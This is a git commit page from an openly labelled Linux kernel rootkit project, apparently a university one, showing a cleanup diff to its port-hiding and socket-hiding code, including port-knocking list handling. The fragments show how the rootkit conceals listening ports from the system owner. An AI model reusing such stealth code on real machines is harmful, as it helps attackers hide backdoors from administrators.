linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 8ab78daaeef61feac7a3407af43b6ecd4f2c9788
parent 3743692d5eb1139baeae0dbebf0bfecf10b3dba8
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 21:56:36 +0100

removes redundant code

Diffstat:

Msrc/porthide.c | 37+++----------------------------------


Msrc/sockhide.c | 1-


2 files changed, 3 insertions(+), 35 deletions(-)

diff --git a/src/porthide.c b/src/porthide.c
@@ -86,32 +86,8 @@ stage3_knock(lport_t port)
 void
 clear_hidden_lports(void)
 {
-    knock_list_t_ptr i;
-
-    ip_t no_ip = { 0 };
-
-    i = ips_stage1_tail;
-    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
-        DEBUG_INFO("removing from stage1\n");
-        while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
-    }
-
-    i = ips_stage2_tail;
-    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
-        DEBUG_INFO("removing from stage2\n");
-        while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
-    }
-
-    i = ips_stage3_tail;
-    if (memcmp(i->ip, no_ip, (i->version == v4 ? 4 : 16))) {
-        DEBUG_INFO("removing from stage3\n");
-        while ((i = remove_knock_from_list(i, &i, i->ip, i->version)));
-    }
-
-    lport_list_t_ptr j;
-
-    j = hidden_lports_tail;
-    while ((j = remove_lport_from_list(j, j->lport)));
+    lport_list_t_ptr i = hidden_lports_tail;
+    while ((i = remove_lport_from_list(i, i->lport)));
 }
 
 bool
@@ -185,12 +161,8 @@ find_knock_in_list(knock_list_t_ptr head, ip_t ip, ip_version version)
 {
     knock_list_t_ptr i;
     for (i = head; i; i = i->next)
-        if (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && (version == -1 || i->version == version)) {
-            int knock;
-            memcpy(&knock, ip, 4);
-            DEBUG_INFO("found ip %0X in list\n", knock);
+        if (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && (version == -1 || i->version == version))
             return i;
-        }
 
     return NULL;
 }
@@ -220,9 +192,6 @@ remove_knock_from_list(knock_list_t_ptr list, knock_list_t_ptr *tail, ip_t ip, i
     knock_list_t_ptr i = find_knock_in_list(list, ip, version), ret = NULL;
 
     if (i && (!memcmp(i->ip, ip, (version == v4 ? 4 : 16)) && i->version != -1)) {
-            int knock;
-            memcpy(&knock, ip, 4);
-            DEBUG_INFO("removing ip %0X from list\n", knock);
         if (i->next)
             i->next->prev = i->prev;
         else
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -168,7 +168,6 @@ remove_port_from_list(port_list_t_ptr list, port_t port, proto_t proto)
     port_list_t_ptr i = find_port_in_list(list, port, proto), ret = NULL;
 
     if (i && (i->port != -1 && i->proto != -1)) {
-        DEBUG_INFO("remove_port_from_list: removing port %d\n", port);
         if (i->next)
             i->next->prev = i->prev;
         else